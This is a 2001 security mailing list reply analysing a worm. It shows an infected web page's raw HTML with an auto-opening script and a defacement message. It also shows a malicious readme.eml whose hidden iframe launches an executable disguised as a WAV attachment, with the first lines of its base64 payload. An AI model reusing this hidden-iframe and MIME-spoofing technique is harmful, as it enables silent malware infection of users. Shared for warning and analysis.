Vulnerability Development mailing list archives

Re: New Worm

From: Ray Simard <ray.simard () sylvan-glade com>
Date: Tue, 18 Sep 2001 15:12:57 -0700

On Tue, 18 Sep 2001 11:17:23 -0500, "Enrique A. Compañ Gzz."
<enrique () virtekweb net> wrote:

...
Don't go there if you aren't protected. it downloads readme.eml
automatically and executes.

It seg faults on my machine... fortunally


This is what's on the page in raw form (some line breaks added):

telnet 64.218.116.235 80
Trying 64.218.116.235...
Connected to 64.218.116.235.
Escape character is '^]'.
GET /
<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td>
<p align="center"><font size=7 color=red>fuck USA Government</font><tr><td>
<p align="center"><font size=7 color=red>fuck PoizonBOx<tr><td>
<p align="center"><font size=4 color=red>contact:sysadmcn () yahoo com cn</html>

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>Connection closed by foreign host.



These are the headers and a few lines of the code from the readme.eml:

telnet 64.218.116.235 80
Trying 64.218.116.235...
Connected to 64.218.116.235.
Escape character is '^]'.
GET /readme.eml

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO

Current thread:

New Worm Enrique A. Compañ Gzz. (Sep 18)
- Re: New Worm Naseer Bhatti (Sep 18)
- Re: New Worm Ray Simard (Sep 18)
- RE: New Worm JKruser (Sep 18)
- Re: New Worm Wichert Akkerman (Sep 18)